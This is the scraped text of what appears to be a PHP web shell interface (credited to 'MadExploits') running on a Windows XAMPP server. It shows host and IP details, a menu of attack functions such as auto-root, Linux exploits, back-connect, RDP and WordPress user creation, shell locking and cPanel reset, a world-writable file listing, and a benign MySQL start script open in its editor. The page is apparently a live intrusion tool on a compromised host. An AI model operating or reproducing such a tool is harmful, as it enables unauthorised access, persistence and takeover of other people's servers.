Windows NT DESKTOP-F6O892L 6.2 build 9200 (Windows 8 Professional Edition) i586
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.19
: 10.220.0.88 | : 216.73.216.146
Cant Read [ /etc/named.conf ]
5.6.19
SC-SRV
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ E ]
D: /
xampp /
[ HOME SHELL ]
Name
Size
Permission
Action
MercuryMail
[ DIR ]
drwxrwxrwx
anonymous
[ DIR ]
drwxrwxrwx
apache
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
contrib
[ DIR ]
drwxrwxrwx
htdocs
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
install
[ DIR ]
drwxrwxrwx
licenses
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
mailoutput
[ DIR ]
drwxrwxrwx
mailtodisk
[ DIR ]
drwxrwxrwx
mysql
[ DIR ]
drwxrwxrwx
perl
[ DIR ]
drwxrwxrwx
php
[ DIR ]
drwxrwxrwx
sendmail
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
tomcat
[ DIR ]
drwxrwxrwx
webalizer
[ DIR ]
drwxrwxrwx
COOKIE.txt
410
B
-rw-rw-rw-
RELEASENOTES
1.53
KB
-rw-rw-rw-
filezilla_setup.bat
78
B
-rwxrwxrwx
filezilla_start.bat
150
B
-rwxrwxrwx
filezilla_stop.bat
149
B
-rwxrwxrwx
mercury_start.bat
136
B
-rwxrwxrwx
mercury_stop.bat
60
B
-rwxrwxrwx
mysql_start.bat
481
B
-rwxrwxrwx
mysql_stop.bat
220
B
-rwxrwxrwx
readme_en.txt
7.39
KB
-rw-rw-rw-
service.exe
59.5
KB
-rwxrwxrwx
uninstall.dat
202.92
KB
-rw-rw-rw-
uninstall.exe
8.45
MB
-rwxrwxrwx
xampp-control.exe
3.21
MB
-rwxrwxrwx
xampp-control.ini
1.21
KB
-rw-rw-rw-
xampp-control.log
353.94
KB
-rw-rw-rw-
xampp_shell.bat
1.02
KB
-rwxrwxrwx
xampp_start.exe
116
KB
-rwxrwxrwx
xampp_stop.exe
116
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql_start.bat
@echo off cd /D %~dp0 echo Diese Eingabeforderung nicht waehrend des Running beenden echo Please dont close Window while MySQL is running echo MySQL is trying to start echo Please wait ... echo MySQL is starting with mysql\bin\my.ini (console) mysql\bin\mysqld --defaults-file=mysql\bin\my.ini --standalone --console if errorlevel 1 goto error goto finish :error echo. echo MySQL konnte nicht gestartet werden echo MySQL could not be started pause :finish
Close